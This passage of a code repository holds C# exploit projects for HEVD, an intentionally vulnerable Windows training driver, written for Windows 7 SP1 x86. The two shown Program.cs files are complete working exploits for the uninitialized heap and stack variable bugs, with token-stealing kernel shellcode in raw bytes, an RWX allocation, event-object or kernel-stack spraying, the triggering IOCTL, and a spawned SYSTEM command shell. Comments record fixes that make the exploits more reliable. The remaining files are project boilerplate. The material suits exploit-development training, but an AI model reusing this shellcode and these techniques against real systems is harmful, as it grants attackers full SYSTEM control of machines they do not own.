// duration of the call; no output buffer is used (OutBuffer = IntPtr.Zero, size 0).
[DllImport("kernel32.dll", SetLastError = true)]
static extern bool DeviceIoControl(
    IntPtr hDevice,
    uint dwIoControlCode,
    byte[] InBuffer,
    int nInBufferSize,
    IntPtr OutBuffer,
    int nOutBufferSize,
    ref int pBytesReturned,
    IntPtr lpOverlapped);
90 |
// Spawns the post-exploitation shell.  lpStartupInfo.cb must be set to the structure size
// before the call; lpProcessInformation returns two handles the caller must close.
[DllImport("kernel32.dll", SetLastError = true, CharSet = CharSet.Auto)]
static extern bool CreateProcess(
    string lpApplicationName,
    string lpCommandLine,
    ref SECURITY_ATTRIBUTES lpProcessAttributes,
    ref SECURITY_ATTRIBUTES lpThreadAttributes,
    bool bInheritHandles,
    uint dwCreationFlags,
    IntPtr lpEnvironment,
    string lpCurrentDirectory,
    ref STARTUPINFO lpStartupInfo,
    out PROCESS_INFORMATION lpProcessInformation);
103 |
// Used for the device handle, the sprayed event handles and the child process/thread handles.
[DllImport("kernel32.dll", SetLastError = true)]
static extern bool CloseHandle(IntPtr hObject);
106 |
// Short bounded wait on the spawned shell before its handles are closed; the return value is ignored.
[DllImport("kernel32.dll", SetLastError = true)]
static extern uint WaitForSingleObject(IntPtr hHandle, int dwMilliseconds);
109 |
// Global variables
// HEVD device handle.  IntPtr.Zero means "not open" - CleanUp() treats it as nothing to close.
static IntPtr hDevice = IntPtr.Zero;
112 |
113 | // Helper functions
// Closes the HEVD device handle if one is open and resets hDevice to IntPtr.Zero.
// If CloseHandle fails the error code is printed and hDevice is left untouched.
static void CleanUp()
{
    Console.WriteLine("[>] Cleaning up handle object(s)");
    if (hDevice == IntPtr.Zero)
    {
        return; // nothing was opened
    }

    bool closed = CloseHandle(hDevice);
    if (!closed)
    {
        Console.WriteLine("[!] Failed to close kernel driver's handle (code={0})", Marshal.GetLastWin32Error());
        return;
    }

    hDevice = IntPtr.Zero;
}
129 |
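// Gate for the hard-coded Windows 7 SP1 x86 kernel offsets: true only on build 7601 with a
// native 32-bit kernel; prints a message and returns false otherwise.
//
// PROCESSOR_ARCHITECTURE describes the *process*: a 32-bit build of this tool on 64-bit
// Windows 7 still sees "x86" under WOW64, and the x86 offsets baked into the shellcode would
// then be executed against an x64 kernel (a crash, not a clean failure).  Windows sets
// PROCESSOR_ARCHITEW6432 only inside a WOW64 process, so a non-empty value is treated as
// "not x86".  Environment.Is64BitOperatingSystem is avoided because it is a .NET 4.0 API
// and the sibling projects target v2.0.
static bool IsWin7x86()
{
    string arch = Environment.GetEnvironmentVariable("PROCESSOR_ARCHITECTURE");
    string wow64Arch = Environment.GetEnvironmentVariable("PROCESSOR_ARCHITEW6432");
    int MajorVersion = 0;
    int MinorVersion = 0;
    int BuildNumber = 0;
    RtlGetNtVersionNumbers(ref MajorVersion, ref MinorVersion, ref BuildNumber);
    BuildNumber &= 0xFFFF; // only the low 16 bits are the build number

    bool isWin7Sp1 = MajorVersion == 6 && MinorVersion == 1 && BuildNumber == 7601;
    bool isNativeX86 = string.Compare(arch, "x86", StringComparison.OrdinalIgnoreCase) == 0
                       && string.IsNullOrEmpty(wow64Arch);

    if (isWin7Sp1 && isNativeX86)
    {
        Console.WriteLine("[+] Windows 7 SP1 x86 is detected");
        return true;
    }

    Console.WriteLine("[-] Unsupported OS is detected");
    return false;
}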
151 |
// Reports whether the process is running as SYSTEM, by a case-insensitive comparison of the
// current user name.  Called after the IOCTL to confirm the token swap took effect.
static bool IsSystem()
{
    string currentUser = Environment.UserName;
    return string.Compare(currentUser, "SYSTEM", StringComparison.OrdinalIgnoreCase) == 0;
}
165 |
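// Launches cmd.exe in a new console with this process's (by now SYSTEM) token.
// Returns true if CreateProcess succeeded, false (after printing the Win32 error) otherwise.
//
// Fix: STARTUPINFO.cb is now set to the structure size, which the CreateProcess contract
// requires; the original left it at 0.  The child is waited on for up to 500 ms and both
// returned handles are closed; closing them does not terminate the shell.
static bool SpawnShell()
{
    string ApplicationName = "C:\\Windows\\System32\\cmd.exe";
    string CurrentDirectory = "C:\\Windows\\System32";
    uint CREATE_NEW_CONSOLE = 0x00000010;

    SECURITY_ATTRIBUTES pSec = new SECURITY_ATTRIBUTES();
    SECURITY_ATTRIBUTES tSec = new SECURITY_ATTRIBUTES();
    pSec.nLength = Marshal.SizeOf(pSec);
    tSec.nLength = Marshal.SizeOf(tSec);

    STARTUPINFO si = new STARTUPINFO();
    si.cb = Marshal.SizeOf(si); // required by CreateProcess; was previously left at 0

    PROCESS_INFORMATION pi;
    bool status = CreateProcess(
        ApplicationName, null, ref pSec, ref tSec, false,
        CREATE_NEW_CONSOLE, IntPtr.Zero, CurrentDirectory,
        ref si, out pi);

    if (!status)
    {
        Console.WriteLine("[!] Failed to spawn shell (code={0})", Marshal.GetLastWin32Error());
        return false;
    }

    Console.WriteLine("[+] Shell is spawned successfully (PID = {0})", pi.dwProcessId);
    WaitForSingleObject(pi.hProcess, 500);
    CloseHandle(pi.hProcess);
    CloseHandle(pi.hThread);
    return true;
}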
196 |
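// Builds the random tail of a sprayed event name: `length` ASCII characters drawn from
// [0-9A-Za-z].  Returns "" for length 0; throws ArgumentOutOfRangeException for a negative length.
//
// Fix: the caller creates hundreds of named events in a tight loop and needs every name to be
// distinct - CreateEvent with a name that already exists opens the existing object instead of
// allocating a new one, which silently shrinks the pool spray.  On the .NET Framework a
// time-seeded `new Random()` per call returns identical sequences within the same tick, so
// consecutive names collided.  Bytes now come from the system CSPRNG, which is fresh per call.
// Modulo bias is irrelevant here: only distinctness matters, not uniformity.
static string GetRandomString(int length)
{
    if (length < 0)
    {
        throw new ArgumentOutOfRangeException(nameof(length), "length must not be negative");
    }
    if (length == 0)
    {
        return string.Empty;
    }

    byte[] alphabet = Encoding.ASCII.GetBytes("0123456789ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz");
    byte[] randomBytes = new byte[length];

    // Not wrapped in `using`: RandomNumberGenerator is not IDisposable on the v2.0 framework
    // the sibling projects target.
    System.Security.Cryptography.RandomNumberGenerator rng = System.Security.Cryptography.RandomNumberGenerator.Create();
    rng.GetBytes(randomBytes);

    for (int i = 0; i < length; i++)
    {
        randomBytes[i] = alphabet[randomBytes[i] % alphabet.Length];
    }

    return Encoding.ASCII.GetString(randomBytes);
}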
210 |
211 | // Main function
212 | static void Main()
213 | {
214 | byte[] shellcode = {
215 | //--[Setup]
216 | 0x60, // pushad
217 | 0x64, 0xA1, 0x24, 0x01, 0x00, 0x00, // mov eax, fs:[KTHREAD_OFFSET]
218 | 0x8B, 0x40, 0x50, // mov eax, [eax + EPROCESS_OFFSET]
219 | 0x89, 0xC1, // mov ecx, eax (Current _EPROCESS structure)
220 | 0x8B, 0x98, 0xF8, 0x00, 0x00, 0x00, // mov ebx, [eax + TOKEN_OFFSET]
221 | //--[Copy System PID token]
222 | 0xBA, 0x04, 0x00, 0x00, 0x00, // mov edx, 4 (SYSTEM PID)
223 | 0x8B, 0x80, 0xB8, 0x00, 0x00, 0x00, // mov eax, [eax + FLINK_OFFSET] <-|
224 | 0x2D, 0xB8, 0x00, 0x00, 0x00, // sub eax, FLINK_OFFSET |
225 | 0x39, 0x90, 0xB4, 0x00, 0x00, 0x00, // cmp [eax + PID_OFFSET], edx |
226 | 0x75, 0xED, // jnz ->|
227 | 0x8B, 0x90, 0xF8, 0x00, 0x00, 0x00, // mov edx, [eax + TOKEN_OFFSET]
228 | 0x89, 0x91, 0xF8, 0x00, 0x00, 0x00, // mov [ecx + TOKEN_OFFSET], edx
229 | //--[Recover]
230 | 0x61, // popad
231 | 0xC3 // ret
232 | };
233 |
234 | Console.WriteLine("--[ HEVD Exploitation : Uninitialized Heap Variable\n");
235 |
236 | if (!IsWin7x86())
237 | {
238 | return;
239 | }
240 |
241 | // Step 1: Allocate Token Stealing Shellcode
242 | IntPtr ShellcodeBuffer;
243 | uint dwSize = 0x1000;
244 | uint MEM_COMMIT = 0x00001000;
245 | uint MEM_RESERVE = 0x00002000;
246 | uint PAGE_EXECUTE_READWRITE = 0x40;
247 |
248 | Console.WriteLine("[>] Trying to allocate shellcode");
249 | ShellcodeBuffer = VirtualAlloc(new IntPtr(0x40400140), dwSize, MEM_COMMIT | MEM_RESERVE, PAGE_EXECUTE_READWRITE);
250 |
251 | if (ShellcodeBuffer == IntPtr.Zero)
252 | {
253 | Console.WriteLine("[-] Failed to VirtualAlloc (code={0})", Marshal.GetLastWin32Error());
254 | return;
255 | }
256 |
257 | Console.WriteLine("[+] Allocated {0} bytes buffer at 0x{1}", dwSize, ShellcodeBuffer.ToString("X8"));
258 | int offset = 0x40400140 - ShellcodeBuffer.ToInt32();
259 | Marshal.Copy(shellcode, 0, new IntPtr(ShellcodeBuffer.ToInt32() + offset), shellcode.Length);
260 | Console.WriteLine("[+] Shellcode is allocated at 0x{0}", ShellcodeBuffer.ToString("X8"));
261 |
262 | // Step 2: Open driver's handle
263 | string deviceName = "\\\\.\\HacksysExtremeVulnerableDriver";
264 | uint GENERIC_READ = 0x80000000;
265 | uint GENERIC_WRITE = 0x40000000;
266 | uint FILE_SHARE_READ = 0x00000001;
267 | uint FILE_SHARE_WRITE = 0x00000002;
268 | uint OPEN_EXISTING = 0x3;
269 | uint FILE_ATTRIBUTE_NORMAL = 0x80;
270 | uint FILE_FLAG_OVERWRAPPED = 0x40000000;
271 | IntPtr invalid = new IntPtr(-1);
272 |
273 | Console.WriteLine("[>] Opening {0}", deviceName);
274 | hDevice = CreateFile(
275 | deviceName, GENERIC_READ | GENERIC_WRITE,
276 | FILE_SHARE_READ | FILE_SHARE_WRITE, IntPtr.Zero,
277 | OPEN_EXISTING, FILE_ATTRIBUTE_NORMAL | FILE_FLAG_OVERWRAPPED, IntPtr.Zero);
278 |
279 | if (hDevice == invalid)
280 | {
281 | Console.WriteLine("[-] Failed to open {0} (code={1})", deviceName, Marshal.GetLastWin32Error());
282 | return;
283 | }
284 |
285 | Console.WriteLine("[+] HEVD.sys is opened succesfuly (hDevice = 0x{0})", hDevice.ToString("X"));
286 |
287 | // Step 3: Event object spray and trigger vulnerability
288 | uint ioctl = 0x222033;
289 | byte[] payload = BitConverter.GetBytes(0xdeadbeef);
290 | int BytesReturned = 0;
291 | int num = 256;
292 | IntPtr[] hEvents = new IntPtr[num];
293 | string eventName;
294 | int counter = 0;
295 |
296 | Console.WriteLine("[>] Performing event object spraying and triggering vulnerability");
297 |
298 | for (int i = 0; i < num; i++)
299 | {
300 | eventName = string.Concat("EVIL\x40\x01\x40\x40", GetRandomString(0xf0 - 8));
301 | hEvents[i] = CreateEventW(IntPtr.Zero, false, false, eventName);
302 | if (hEvents[i] != IntPtr.Zero)
303 | {
304 | counter++;
305 | }
306 | }
307 |
308 | Console.WriteLine("[+] {0} event objects are created", counter);
309 | counter = 0;
310 |
311 | for (int i = 0; i < num; i++)
312 | {
313 | if (CloseHandle(hEvents[i]))
314 | {
315 | counter++;
316 | }
317 | }
318 |
319 | bool status = DeviceIoControl(hDevice, ioctl, payload, payload.Length, IntPtr.Zero, 0, ref BytesReturned, IntPtr.Zero);
320 | if (!status)
321 | {
322 | Console.WriteLine("[-] Failed to send payload (code={0})", Marshal.GetLastWin32Error());
323 | CleanUp();
324 | return;
325 | }
326 |
327 | CleanUp();
328 |
329 | // Step 4: Spawn SYSTEM shell
330 | if (IsSystem() && SpawnShell())
331 | {
332 | Console.WriteLine("[+] Exploit is completed successfully");
333 | }
334 | else
335 | {
336 | Console.WriteLine("[-] Failed to exploit");
337 | }
338 | }
339 | }
340 | }
--------------------------------------------------------------------------------
/HEVD_Win7x86/UninitializedHeapVariable/Properties/AssemblyInfo.cs:
--------------------------------------------------------------------------------
1 | using System.Reflection;
2 | using System.Runtime.CompilerServices;
3 | using System.Runtime.InteropServices;
4 |
// Assembly metadata for the UninitializedHeapVariable project. The Guid below
// matches the ProjectGuid in UninitializedHeapVariable.csproj.
// General Information about an assembly is controlled through the following
// set of attributes. Change these attribute values to modify the information
// associated with an assembly.
[assembly: AssemblyTitle("UninitializedHeapVariable")]
[assembly: AssemblyDescription("")]
[assembly: AssemblyConfiguration("")]
[assembly: AssemblyCompany("")]
[assembly: AssemblyProduct("UninitializedHeapVariable")]
[assembly: AssemblyCopyright("Copyright © 2021")]
[assembly: AssemblyTrademark("")]
[assembly: AssemblyCulture("")]

// Setting ComVisible to false makes the types in this assembly not visible
// to COM components. If you need to access a type in this assembly from
// COM, set the ComVisible attribute to true on that type.
[assembly: ComVisible(false)]

// The following GUID is for the ID of the typelib if this project is exposed to COM
[assembly: Guid("8cf9a838-5690-4da3-ae5d-8043ce1fa141")]

// Version information for an assembly consists of the following four values:
//
// Major Version
// Minor Version
// Build Number
// Revision
//
// You can specify all the values or you can default the Build and Revision Numbers
// by using the '*' as shown below:
// [assembly: AssemblyVersion("1.0.*")]
// Both versions are pinned to 1.0.0.0 (no '*' wildcard), so every rebuild
// produces the same version numbers.
[assembly: AssemblyVersion("1.0.0.0")]
[assembly: AssemblyFileVersion("1.0.0.0")]
37 |
--------------------------------------------------------------------------------
/HEVD_Win7x86/UninitializedHeapVariable/UninitializedHeapVariable.csproj:
--------------------------------------------------------------------------------
1 |
2 |
3 |
4 |
5 | Debug
6 | AnyCPU
7 | {8CF9A838-5690-4DA3-AE5D-8043CE1FA141}
8 | Exe
9 | UninitializedHeapVariable
10 | UninitializedHeapVariable
11 | v2.0
12 | 512
13 | true
14 |
15 |
16 | true
17 | ..\bin\x86\Debug\
18 | DEBUG;TRACE
19 | full
20 | x86
21 | 7.3
22 | prompt
23 |
24 |
25 | ..\bin\x86\Release\
26 | TRACE
27 | true
28 | pdbonly
29 | x86
30 | 7.3
31 | prompt
32 |
33 |
34 |
35 |
36 |
37 |
38 |
39 |
40 |
41 |
42 |
43 |
--------------------------------------------------------------------------------
/HEVD_Win7x86/UninitializedStackVariable/App.config:
--------------------------------------------------------------------------------
1 |
2 |
3 |
4 |
5 |
6 |
7 |
--------------------------------------------------------------------------------
/HEVD_Win7x86/UninitializedStackVariable/Program.cs:
--------------------------------------------------------------------------------
1 | using System;
2 | using System.Runtime.InteropServices;
3 |
4 | namespace UninitializedStackVariable
5 | {
/// <summary>
/// HEVD "Uninitialized Stack Variable" writeup for Windows 7 SP1 x86.
/// Main() runs four steps: (1) allocate an RWX buffer holding the token-stealing
/// shellcode, (2) open the HEVD device, (3) spray the kernel stack via
/// NtMapUserPhysicalPages and send IOCTL 0x22202F, (4) check whether the process
/// now runs as SYSTEM and spawn cmd.exe. Everything is gated on IsWin7x86()
/// because the structure offsets baked into the shellcode are version-specific.
/// </summary>
class Program
{
    // Win32 SECURITY_ATTRIBUTES; only nLength is populated before use (see SpawnShell).
    [StructLayout(LayoutKind.Sequential)]
    struct SECURITY_ATTRIBUTES
    {
        public int nLength;
        public IntPtr lpSecurityDescriptor;
        public int bInheritHandle;
    }

    // Win32 STARTUPINFO (Unicode). SpawnShell passes a zeroed instance, i.e. cb is 0.
    [StructLayout(LayoutKind.Sequential, CharSet=CharSet.Unicode)]
    struct STARTUPINFO
    {
        public int cb;
        public string lpReserved;
        public string lpDesktop;
        public string lpTitle;
        public int dwX;
        public int dwY;
        public int dwXSize;
        public int dwYSize;
        public int dwXCountChars;
        public int dwYCountChars;
        public int dwFillAttribute;
        public int dwFlags;
        public short wShowWindow;
        public short cbReserved2;
        public IntPtr lpReserved2;
        public IntPtr hStdInput;
        public IntPtr hStdOutput;
        public IntPtr hStdError;
    }

    // Win32 PROCESS_INFORMATION; the two handles are closed by SpawnShell after a short wait.
    [StructLayout(LayoutKind.Sequential)]
    struct PROCESS_INFORMATION
    {
        public IntPtr hProcess;
        public IntPtr hThread;
        public int dwProcessId;
        public int dwThreadId;
    }

    // Undocumented ntdll export used by IsWin7x86 for an OS version check
    // that does not depend on the manifest-aware GetVersionEx behaviour.
    [DllImport("ntdll.dll")]
    static extern void RtlGetNtVersionNumbers(
        ref int MajorVersion,
        ref int MinorVersion,
        ref int BuildNumber);

    [DllImport("kernel32.dll", SetLastError = true)]
    static extern IntPtr VirtualAlloc(
        IntPtr lpAddress,
        uint dwSize,
        uint flAllocationType,
        uint flProtect);

    // Native syscall wrapper; PageFrameNumbers is marshalled as a plain byte array.
    // The return NTSTATUS is ignored by the only caller (Main).
    [DllImport("ntdll.dll")]
    static extern int NtMapUserPhysicalPages(
        IntPtr BaseAddress,
        uint NumberOfPages,
        byte[] PageFrameNumbers);

    [DllImport("kernel32.dll", CharSet = CharSet.Auto, SetLastError = true)]
    static extern IntPtr CreateFile(
        string lpFileName,
        uint dwDesiredAccess,
        uint dwShareMode,
        IntPtr lpSecurityAttributes,
        uint dwCreationDisposition,
        uint dwFlagsAndAttributes,
        IntPtr hTemplateFile);

    [DllImport("kernel32.dll", SetLastError = true)]
    static extern bool DeviceIoControl(
        IntPtr hDevice,
        uint dwIoControlCode,
        byte[] InBuffer,
        int nInBufferSize,
        IntPtr OutBuffer,
        int nOutBufferSize,
        ref int pBytesReturned,
        IntPtr lpOverlapped);

    [DllImport("kernel32.dll", SetLastError = true, CharSet = CharSet.Auto)]
    static extern bool CreateProcess(
        string lpApplicationName,
        string lpCommandLine,
        ref SECURITY_ATTRIBUTES lpProcessAttributes,
        ref SECURITY_ATTRIBUTES lpThreadAttributes,
        bool bInheritHandles,
        uint dwCreationFlags,
        IntPtr lpEnvironment,
        string lpCurrentDirectory,
        ref STARTUPINFO lpStartupInfo,
        out PROCESS_INFORMATION lpProcessInformation);

    [DllImport("kernel32.dll", SetLastError = true)]
    static extern bool CloseHandle(IntPtr hObject);

    [DllImport("kernel32.dll", SetLastError = true)]
    static extern uint WaitForSingleObject(IntPtr hHandle, int dwMilliseconds);

    // Global variables
    // Handle to the HEVD device; IntPtr.Zero when not open. Owned by Main, released by CleanUp.
    static IntPtr hDevice = IntPtr.Zero;

    // Helper functions

    /// <summary>
    /// Closes the device handle held in <see cref="hDevice"/> if one is open and
    /// resets it to IntPtr.Zero on success. A failed CloseHandle is logged and the
    /// stale value is left in place.
    /// </summary>
    static void CleanUp()
    {
        Console.WriteLine("[>] Cleaning up handle object(s)");
        if (hDevice != IntPtr.Zero)
        {
            if (CloseHandle(hDevice))
            {
                hDevice = IntPtr.Zero;
            }
            else
            {
                Console.WriteLine("[!] Failed to close kernel driver's handle (code={0})", Marshal.GetLastWin32Error());
            }
        }
    }

    /// <summary>
    /// Returns true only on Windows 7 SP1 (6.1 build 7601) with
    /// PROCESSOR_ARCHITECTURE == "x86". This is the guard for the hard-coded
    /// kernel structure offsets used by the shellcode in Main.
    /// </summary>
    /// <returns>True if the running OS matches; false (with a message) otherwise.</returns>
    static bool IsWin7x86()
    {
        // NOTE(review): this is the environment variable of the current process, so
        // a 32-bit process under WOW64 on an x64 OS would also report "x86" — confirm
        // whether that case needs to be rejected.
        string arch = Environment.GetEnvironmentVariable("PROCESSOR_ARCHITECTURE");
        int MajorVersion = 0;
        int MinorVersion = 0;
        int BuildNumber = 0;
        RtlGetNtVersionNumbers(ref MajorVersion, ref MinorVersion, ref BuildNumber);
        // Only the low 16 bits carry the build number; the upper bits are flag bits.
        BuildNumber &= 0xFFFF;

        if (MajorVersion == 6 && MinorVersion == 1 && BuildNumber == 7601 &&
            string.Compare(arch, "x86", StringComparison.OrdinalIgnoreCase) == 0)
        {
            Console.WriteLine("[+] Windows 7 SP1 x86 is detected");
            return true;
        }
        else
        {
            Console.WriteLine("[-] Unsupported OS is detected");
            return false;
        }
    }

    /// <summary>
    /// Reports whether the current process identity is "SYSTEM" (case-insensitive
    /// compare of Environment.UserName). Used after the trigger to decide whether
    /// the token swap took effect.
    /// </summary>
    static bool IsSystem()
    {
        string user = Environment.UserName;

        if (string.Compare(user, "SYSTEM", StringComparison.OrdinalIgnoreCase) == 0)
        {
            return true;
        }
        else
        {
            return false;
        }
    }

    /// <summary>
    /// Launches C:\Windows\System32\cmd.exe in a new console, waits up to 500 ms,
    /// then closes the process and thread handles. The child keeps running; the
    /// wait only gives it time to start.
    /// </summary>
    /// <returns>The CreateProcess result; the Win32 error is logged on failure.</returns>
    static bool SpawnShell()
    {
        string ApplicationName = "C:\\Windows\\System32\\cmd.exe";
        SECURITY_ATTRIBUTES pSec = new SECURITY_ATTRIBUTES();
        SECURITY_ATTRIBUTES tSec = new SECURITY_ATTRIBUTES();
        uint CREATE_NEW_CONSOLE = 0x00000010;
        string CurrentDirectory = "C:\\Windows\\System32";
        // NOTE(review): si.cb is never set; the documented convention is
        // si.cb = Marshal.SizeOf(si) before calling CreateProcess.
        STARTUPINFO si = new STARTUPINFO();
        pSec.nLength = Marshal.SizeOf(pSec);
        tSec.nLength = Marshal.SizeOf(tSec);

        bool status = CreateProcess(
            ApplicationName, null, ref pSec, ref tSec, false,
            CREATE_NEW_CONSOLE, IntPtr.Zero, CurrentDirectory,
            ref si, out PROCESS_INFORMATION pi);

        if (status)
        {
            Console.WriteLine("[+] Shell is spawned successfully (PID = {0})", pi.dwProcessId);
            // Return value (timeout vs. signalled) is intentionally not checked.
            WaitForSingleObject(pi.hProcess, 500);
            CloseHandle(pi.hProcess);
            CloseHandle(pi.hThread);
        }
        else
        {
            Console.WriteLine("[!] Failed to spawn shell (code={0})", Marshal.GetLastWin32Error());
        }

        return status;
    }

    // Main function

    /// <summary>
    /// Entry point. Returns early (without opening the device) if the OS check or
    /// VirtualAlloc fails; once the device is open, CleanUp() is called on both the
    /// failure and success paths of the IOCTL before the shell step runs.
    /// </summary>
    static void Main()
    {
        // Token-stealing payload. The KTHREAD/EPROCESS/TOKEN/FLINK/PID offsets are
        // hard-coded for the Windows 7 SP1 x86 build that IsWin7x86() requires.
        byte[] shellcode = {
            //--[Setup]
            0x60, // pushad
            0x64, 0xA1, 0x24, 0x01, 0x00, 0x00, // mov eax, fs:[KTHREAD_OFFSET]
            0x8B, 0x40, 0x50, // mov eax, [eax + EPROCESS_OFFSET]
            0x89, 0xC1, // mov ecx, eax (Current _EPROCESS structure)
            0x8B, 0x98, 0xF8, 0x00, 0x00, 0x00, // mov ebx, [eax + TOKEN_OFFSET]
            //--[Copy System PID token]
            0xBA, 0x04, 0x00, 0x00, 0x00, // mov edx, 4 (SYSTEM PID)
            0x8B, 0x80, 0xB8, 0x00, 0x00, 0x00, // mov eax, [eax + FLINK_OFFSET] <-|
            0x2D, 0xB8, 0x00, 0x00, 0x00, // sub eax, FLINK_OFFSET |
            0x39, 0x90, 0xB4, 0x00, 0x00, 0x00, // cmp [eax + PID_OFFSET], edx |
            0x75, 0xED, // jnz ->|
            0x8B, 0x90, 0xF8, 0x00, 0x00, 0x00, // mov edx, [eax + TOKEN_OFFSET]
            0x89, 0x91, 0xF8, 0x00, 0x00, 0x00, // mov [ecx + TOKEN_OFFSET], edx
            //--[Recover]
            0x61, // popad
            0xC3 // ret
        };

        Console.WriteLine("--[ HEVD Exploitation : Uninitialized Stack Variable\n");

        if (!IsWin7x86())
        {
            return;
        }

        // Step 1: Allocate Token Stealing Shellcode
        IntPtr ShellcodeBuffer;
        uint dwSize = 0x1000;
        uint MEM_COMMIT = 0x00001000;
        uint MEM_RESERVE = 0x00002000;
        uint PAGE_EXECUTE_READWRITE = 0x40;

        Console.WriteLine("[>] Trying to allocate shellcode");
        // One RWX page at an address chosen by the system (lpAddress == NULL);
        // RWX user allocations like this are a common EDR/memory-scan signal.
        ShellcodeBuffer = VirtualAlloc(IntPtr.Zero, dwSize, MEM_COMMIT | MEM_RESERVE, PAGE_EXECUTE_READWRITE);

        if (ShellcodeBuffer == IntPtr.Zero)
        {
            Console.WriteLine("[-] Failed to VirtualAlloc (code={0})", Marshal.GetLastWin32Error());
            return;
        }

        Console.WriteLine("[+] Allocated {0} bytes buffer at 0x{1}", dwSize, ShellcodeBuffer.ToString("X8"));
        Marshal.Copy(shellcode, 0, ShellcodeBuffer, shellcode.Length);
        Console.WriteLine("[+] Shellcode is allocated at 0x{0}", ShellcodeBuffer.ToString("X8"));

        // Step 2: Open driver's handle
        // A user-mode process opening this device name is the observable event a
        // defender can alert on; HEVD is an intentionally vulnerable training driver.
        string deviceName = "\\\\.\\HacksysExtremeVulnerableDriver";
        uint GENERIC_READ = 0x80000000;
        uint GENERIC_WRITE = 0x40000000;
        uint FILE_SHARE_READ = 0x00000001;
        uint FILE_SHARE_WRITE = 0x00000002;
        uint OPEN_EXISTING = 0x3;
        uint FILE_ATTRIBUTE_NORMAL = 0x80;
        // 0x40000000 is FILE_FLAG_OVERLAPPED; the local's name is misspelled.
        uint FILE_FLAG_OVERWRAPPED = 0x40000000;
        // INVALID_HANDLE_VALUE, which is what CreateFile returns on failure.
        IntPtr invalid = new IntPtr(-1);

        Console.WriteLine("[>] Opening {0}", deviceName);
        hDevice = CreateFile(
            deviceName, GENERIC_READ | GENERIC_WRITE,
            FILE_SHARE_READ | FILE_SHARE_WRITE, IntPtr.Zero,
            OPEN_EXISTING, FILE_ATTRIBUTE_NORMAL | FILE_FLAG_OVERWRAPPED, IntPtr.Zero);

        if (hDevice == invalid)
        {
            // hDevice keeps INVALID_HANDLE_VALUE here; nothing else is open yet, so no CleanUp.
            Console.WriteLine("[-] Failed to open {0} (code={1})", deviceName, Marshal.GetLastWin32Error());
            return;
        }

        Console.WriteLine("[+] HEVD.sys is opened succesfuly (hDevice = 0x{0})", hDevice.ToString("X"));

        // Step 3: Stack spray and trigger vulnerability
        uint ioctl = 0x22202F;
        byte[] payload = BitConverter.GetBytes(0xdeadbeef);
        int BytesReturned = 0;
        // 1024 pointer-sized slots (4 bytes each on the x86 target) all holding the
        // shellcode address, built by the loop below.
        byte[] StackSprayPayload = new byte[1024 * Marshal.SizeOf(typeof(IntPtr))];
        byte[] pointer = BitConverter.GetBytes(ShellcodeBuffer.ToInt32());
        int destination;
        int size = Marshal.SizeOf(typeof(IntPtr));

        for (int i = 0; i < 1024; i++)
        {
            destination = i * Marshal.SizeOf(typeof(IntPtr));
            Buffer.BlockCopy(pointer, 0, StackSprayPayload, destination, size);
        }

        Console.WriteLine("[>] Stack spraying and triggering vulnerability");
        // NOTE(review): called only for its side effect on the kernel stack (the
        // "stack spray" above); its NTSTATUS is not checked, so a failure here is
        // not reported and the IOCTL below is sent regardless.
        NtMapUserPhysicalPages(IntPtr.Zero, 1024, StackSprayPayload);
        bool status = DeviceIoControl(hDevice, ioctl, payload, payload.Length, IntPtr.Zero, 0, ref BytesReturned, IntPtr.Zero);

        if (!status)
        {
            Console.WriteLine("[-] Failed to send payload (code={0})", Marshal.GetLastWin32Error());
            CleanUp();
            return;
        }

        CleanUp();

        // Step 4: Spawn SYSTEM shell
        // SpawnShell() only runs if IsSystem() is true (short-circuit &&).
        if (IsSystem() && SpawnShell())
        {
            Console.WriteLine("[+] Exploit is completed successfully");
        }
        else
        {
            Console.WriteLine("[-] Failed to exploit");
        }
    }
}
308 | }
--------------------------------------------------------------------------------
/HEVD_Win7x86/UninitializedStackVariable/Properties/AssemblyInfo.cs:
--------------------------------------------------------------------------------
1 | using System.Reflection;
2 | using System.Runtime.CompilerServices;
3 | using System.Runtime.InteropServices;
4 |
// Assembly metadata for the UninitializedStackVariable project. The Guid below
// matches the ProjectGuid in UninitializedStackVariable.csproj.
// General Information about an assembly is controlled through the following
// set of attributes. Change these attribute values to modify the information
// associated with an assembly.
[assembly: AssemblyTitle("UninitializedStackVariable")]
[assembly: AssemblyDescription("")]
[assembly: AssemblyConfiguration("")]
[assembly: AssemblyCompany("")]
[assembly: AssemblyProduct("UninitializedStackVariable")]
[assembly: AssemblyCopyright("Copyright © 2021")]
[assembly: AssemblyTrademark("")]
[assembly: AssemblyCulture("")]

// Setting ComVisible to false makes the types in this assembly not visible
// to COM components. If you need to access a type in this assembly from
// COM, set the ComVisible attribute to true on that type.
[assembly: ComVisible(false)]

// The following GUID is for the ID of the typelib if this project is exposed to COM
[assembly: Guid("d583fb11-8f46-410a-abf3-45ce8c5966ca")]

// Version information for an assembly consists of the following four values:
//
// Major Version
// Minor Version
// Build Number
// Revision
//
// You can specify all the values or you can default the Build and Revision Numbers
// by using the '*' as shown below:
// [assembly: AssemblyVersion("1.0.*")]
// Both versions are pinned to 1.0.0.0 (no '*' wildcard), so every rebuild
// produces the same version numbers.
[assembly: AssemblyVersion("1.0.0.0")]
[assembly: AssemblyFileVersion("1.0.0.0")]
37 |
--------------------------------------------------------------------------------
/HEVD_Win7x86/UninitializedStackVariable/UninitializedStackVariable.csproj:
--------------------------------------------------------------------------------
1 |
2 |
3 |
4 |
5 | Debug
6 | AnyCPU
7 | {D583FB11-8F46-410A-ABF3-45CE8C5966CA}
8 | Exe
9 | UninitializedStackVariable
10 | UninitializedStackVariable
11 | v2.0
12 | 512
13 | true
14 |
15 |
16 |
17 | true
18 | ..\bin\x86\Debug\
19 | DEBUG;TRACE
20 | full
21 | x86
22 | prompt
23 | MinimumRecommendedRules.ruleset
24 |
25 |
26 | ..\bin\x86\Release\
27 | TRACE
28 | true
29 | pdbonly
30 | x86
31 | prompt
32 | MinimumRecommendedRules.ruleset
33 |
34 |
35 |
36 |
37 |
38 |
39 |
40 |
41 |
42 |
43 |
44 |
45 |
46 |
47 |
--------------------------------------------------------------------------------
/HEVD_Win7x86/UseAfterFree/App.config:
--------------------------------------------------------------------------------
1 |
2 |
3 |
4 |
5 |
6 |
7 |
--------------------------------------------------------------------------------
/HEVD_Win7x86/UseAfterFree/Properties/AssemblyInfo.cs:
--------------------------------------------------------------------------------
1 | using System.Reflection;
2 | using System.Runtime.CompilerServices;
3 | using System.Runtime.InteropServices;
4 |
// Assembly metadata for the UseAfterFree project. The Guid below matches the
// ProjectGuid in UseAfterFree.csproj.
// General Information about an assembly is controlled through the following
// set of attributes. Change these attribute values to modify the information
